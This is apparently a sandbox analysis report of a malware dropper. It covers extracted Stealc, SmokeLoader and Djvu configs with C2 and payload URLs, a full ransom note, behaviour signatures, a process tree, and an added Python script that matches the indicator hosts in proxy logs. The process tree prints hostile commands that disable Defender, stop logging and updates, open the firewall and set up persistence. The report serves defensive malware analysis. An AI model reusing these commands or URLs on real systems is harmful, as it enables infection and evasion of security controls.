Analysis

  • max time kernel
    71s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/01/2024, 13:39

General

  • Target

    file.exe

  • Size

    9.3MB

  • MD5

    aca54a0ddb87930dc31fe9123c46d76d

  • SHA1

    ea2b2453cdff42d802117ab302028c9614a83a43

  • SHA256

    9587bda655a2dc730e4bdbd7de5ab39bc37de697fe22f449a6b2f851adaedfb8

  • SHA512

    0ce4c6283f9112413e247d3dc79e033afa90321f55f36eb9cb1b38f051987ca3b9c808c5b323112fefe702cb56c90a0006421a2ec46e343e4d1c04ecf63aa44e

  • SSDEEP

    196608:Zlzk48Er+gQjoW4fsySabpuYf8GLgB4cmNYqp5eiQt1Cz7Zy:ZKPgAEUy5bpjrLg7mia5JQt1C5

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276�6914c4.php

rc4.plain

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://habrafa.com/test1/get.php

Attributes
  • extension

    .cdpo

  • offline_id

    Bn3q97hwLouKbhkQRNO4SeV07gjdEQVm8NKhg0t1

  • payload_url

    http://brusuax.com/dl/build2.exe

    http://habrafa.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-FCWSCsjEWS Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0844OSkw

rsa_pubkey.plain
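The C2 and payload URLs extracted above are the indicators most worth pushing into proxy/DNS monitoring. The following is an added example (not part of the sandbox report) that matches those indicators, by host, against a few constructed proxy log lines; the log format, the client addresses and the request paths in the sample are assumptions, only the hosts are taken from the configs on this page.

```python
"""Match the C2/payload hosts extracted from this sample against proxy logs.

Added example; the indicator lists are copied from the extracted configs on
this page, the log format and the log lines below are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Indicators copied from the Malware Config section above.
FAMILY_URLS: dict[str, list[str]] = {
    "stealc": ["http://185.172.128.79"],
    "smokeloader": [
        "http://trad-einmyus.com/index.php",
        "http://tradein-myus.com/index.php",
        "http://trade-inmyus.com/index.php",
    ],
    "djvu": [
        "http://habrafa.com/test1/get.php",          # C2
        "http://brusuax.com/dl/build2.exe",          # payload_url
        "http://habrafa.com/files/1/build3.exe",     # payload_url
    ],
}

# Constructed log format: "<timestamp> <client> <method> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)

# Constructed sample lines; the request paths here are invented, not the real gate paths.
SAMPLE_LOG = """\
2024-01-24T13:40:02Z 10.0.0.15 POST http://185.172.128.79/x.php 200
2024-01-24T13:40:05Z 10.0.0.15 GET http://trad-einmyus.com/index.php 200
2024-01-24T13:40:09Z 10.0.0.15 GET http://HABRAFA.com:80/files/1/build3.exe 200
2024-01-24T13:41:00Z 10.0.0.22 GET http://www.example.com/ 200
this line does not parse and must be skipped
""".splitlines()


def host_of(url: str) -> str:
    """Lower-case hostname or IP of a URL (port stripped); bare hosts are accepted too."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def build_index(family_urls: dict[str, list[str]]) -> dict[str, set[str]]:
    """Map every indicator host to the families that use it (habrafa.com is shared by djvu C2 and payload)."""
    index: dict[str, set[str]] = {}
    for family, urls in family_urls.items():
        for url in urls:
            index.setdefault(host_of(url), set()).add(family)
    return index


def match_log(lines: list[str], index: dict[str, set[str]]) -> list[dict]:
    """Return one hit per log line whose URL host is a known indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than crash the sweep
        host = host_of(m.group("url"))
        families = index.get(host)
        if families:
            hits.append({"src": m.group("src"), "host": host,
                         "url": m.group("url"), "families": sorted(families)})
    return hits


def infected_hosts(hits: list[dict]) -> dict[str, list[str]]:
    """Collapse hits to {client: [families]} so one ticket is raised per machine."""
    out: dict[str, set[str]] = {}
    for h in hits:
        out.setdefault(h["src"], set()).update(h["families"])
    return {src: sorted(f) for src, f in out.items()}


if __name__ == "__main__":
    idx = build_index(FAMILY_URLS)
    for hit in match_log(SAMPLE_LOG, idx):
        print(hit)
    print(infected_hosts(match_log(SAMPLE_LOG, idx)))
```

Matching on the host rather than the full URL is deliberate: the Stealc gate path is garbled in the extracted config, and loaders rotate paths far more often than domains.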

Signatures

  • DcRat

    DarkCrystal (DC) is a .NET RAT, active since June 2019, that can load additional plugins.

  • Detected Djvu ransomware 4 IoCs
  • Djvu Ransomware

    Ransomware that is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 21 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • UPX packed file 18 IoCs

    Detects executables packed with the open-source UPX packer or a modified UPX.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from detection.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 15 IoCs

    sc.exe is a Windows utility for controlling services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 55 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read to detect sandbox environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read to detect sandbox environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
      PID:4440
      • C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
        "C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3180
        • C:\Users\Admin\AppData\Local\Temp\nsx4C5D.tmp
          C:\Users\Admin\AppData\Local\Temp\nsx4C5D.tmp
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:4128
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 2372
            4⤵
            • Program crash
            PID:4632
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsx4C5D.tmp" & del "C:\ProgramData\*.dll"" & exit
            4⤵
              PID:3288
          • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
            C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1796
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3084
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                5⤵
                  PID:4492
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:3384
          • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
            "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:1044
          • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
            "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1968
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 372
              3⤵
              • Program crash
              PID:3296
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 388
              3⤵
              • Program crash
              PID:4268
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 420
              3⤵
              • Program crash
              PID:1124
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 676
              3⤵
              • Program crash
              PID:3616
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 688
              3⤵
              • Program crash
              PID:4080
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 744
              3⤵
              • Program crash
              PID:1184
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 748
              3⤵
              • Program crash
              PID:3776
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 688
              3⤵
              • Program crash
              PID:3552
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 776
              3⤵
              • Program crash
              PID:444
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 636
              3⤵
              • Program crash
              PID:3544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 908
              3⤵
              • Program crash
              PID:3160
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 900
              3⤵
              • Program crash
              PID:1640
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 996
              3⤵
              • Program crash
              PID:4132
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 772
              3⤵
              • Program crash
              PID:4620
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 924
              3⤵
              • Program crash
              PID:932
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 852
              3⤵
              • Program crash
              PID:1144
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 856
              3⤵
              • Program crash
              PID:4488
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3728
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 980
              3⤵
              • Program crash
              PID:4752
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 616
              3⤵
              • Program crash
              PID:4660
            • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
              "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Suspicious use of WriteProcessMemory
              PID:1828
              • C:\Windows\system32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                4⤵
                  PID:2416
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2888
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                    PID:1852
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Manipulates WinMonFS driver.
                    • Drops file in Windows directory
                    • Suspicious use of WriteProcessMemory
                    PID:992
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 240
                      5⤵
                      • Program crash
                      PID:3124
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 392
                      5⤵
                      • Program crash
                      PID:4488
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 612
                      5⤵
                      • Program crash
                      PID:4964
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 720
                      5⤵
                      • Program crash
                      PID:3988
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 736
                      5⤵
                      • Program crash
                      PID:4684
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 736
                      5⤵
                      • Program crash
                      PID:3232
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 760
                      5⤵
                      • Program crash
                      PID:4928
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 788
                      5⤵
                      • Program crash
                      PID:2088
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4672
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 388
                      5⤵
                      • Program crash
                      PID:1376
                      • C:\Windows\system32\wusa.exe
                        wusa /uninstall /kb:890830 /quiet /norestart
                        6⤵
                          PID:3720
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 908
                        5⤵
                        • Program crash
                        PID:2504
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 712
                        5⤵
                        • Program crash
                        PID:5068
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 748
                        5⤵
                        • Program crash
                        PID:1360
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                          PID:2460
                          • C:\Windows\SysWOW64\sc.exe
                            sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                            6⤵
                            • Launches sc.exe
                            PID:2036
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /delete /tn ScheduledUpdate /f
                          5⤵
                            PID:4476
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:1420
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            5⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            PID:4456
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 972
                            5⤵
                            • Program crash
                            PID:1144
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 640
                            5⤵
                            • Program crash
                            PID:4304
                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                            5⤵
                            • Executes dropped EXE
                            PID:1264
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:3640
                          • C:\Windows\windefender.exe
                            "C:\Windows\windefender.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1864
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 900
                            5⤵
                            • Program crash
                            PID:1620
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 1128
                            5⤵
                            • Program crash
                            PID:3720
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 1160
                            5⤵
                            • Program crash
                            PID:2812
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 1088
                            5⤵
                            • Program crash
                            PID:3588
                    • C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
                      "C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      PID:2832
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        3⤵
                          PID:3008
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe start "WSNKISKT"
                          3⤵
                          • Launches sc.exe
                          PID:620
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop eventlog
                          3⤵
                          • Launches sc.exe
                          PID:3320
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                          3⤵
                          • Launches sc.exe
                          PID:3584
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe delete "WSNKISKT"
                          3⤵
                          • Launches sc.exe
                          PID:1548
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          3⤵
                            PID:5112
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            3⤵
                              PID:4048
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                              3⤵
                                PID:5088
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                3⤵
                                  PID:4648
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop dosvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:2328
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop bits
                                  3⤵
                                  • Launches sc.exe
                                  PID:3776
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop wuauserv
                                  3⤵
                                  • Launches sc.exe
                                  PID:5056
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:4572
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop UsoSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:1144
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                  3⤵
                                    PID:1376
                                • C:\Users\Admin\AppData\Local\Temp\rty25.exe
                                  "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2112
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1968 -ip 1968
                                1⤵
                                  PID:4752
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                  1⤵
                                    PID:4684
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1968 -ip 1968
                                    1⤵
                                      PID:3312
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1968 -ip 1968
                                      1⤵
                                        PID:2256
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968
                                        1⤵
                                          PID:4924
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
                                          1⤵
                                            PID:4460
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1968 -ip 1968
                                            1⤵
                                              PID:3772
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1968 -ip 1968
                                              1⤵
                                                PID:2868
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1968 -ip 1968
                                                1⤵
                                                  PID:1588
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1968 -ip 1968
                                                  1⤵
                                                    PID:2556
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                                    1⤵
                                                      PID:5076
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
                                                      1⤵
                                                        PID:3444
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1968 -ip 1968
                                                        1⤵
                                                          PID:3256
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                                          1⤵
                                                            PID:3996
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1968 -ip 1968
                                                            1⤵
                                                              PID:616
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1968 -ip 1968
  1⤵
  PID:2008
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
  1⤵
  PID:4104
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1968 -ip 1968
  1⤵
  PID:1940
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968
  1⤵
  PID:432
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 336
  1⤵
  • Program crash
  PID:2016
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 352
  1⤵
  • Program crash
  PID:3124
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1828 -ip 1828
  1⤵
  PID:1788
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 584
  1⤵
  • Program crash
  PID:3996
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1828 -ip 1828
  1⤵
  PID:2036
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1828 -ip 1828
  1⤵
  PID:1376
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 708
  1⤵
  • Program crash
  PID:2700
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 704
  1⤵
  • Program crash
  PID:1156
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 740
  1⤵
  • Program crash
  PID:436
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1828 -ip 1828
  1⤵
  PID:5068
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 736
  1⤵
  • Program crash
  PID:3364
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1828 -ip 1828
  1⤵
  PID:4440
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1828 -ip 1828
  1⤵
  PID:312
• C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nologo -noprofile
  1⤵
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:3172
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 688
  1⤵
  • Program crash
  PID:2680
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1828 -ip 1828
  1⤵
  PID:4660
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 352
  1⤵
  • Program crash
  PID:868
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1828 -ip 1828
  1⤵
  PID:1420
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1828 -ip 1828
  1⤵
  PID:4356
• C:\Windows\system32\netsh.exe
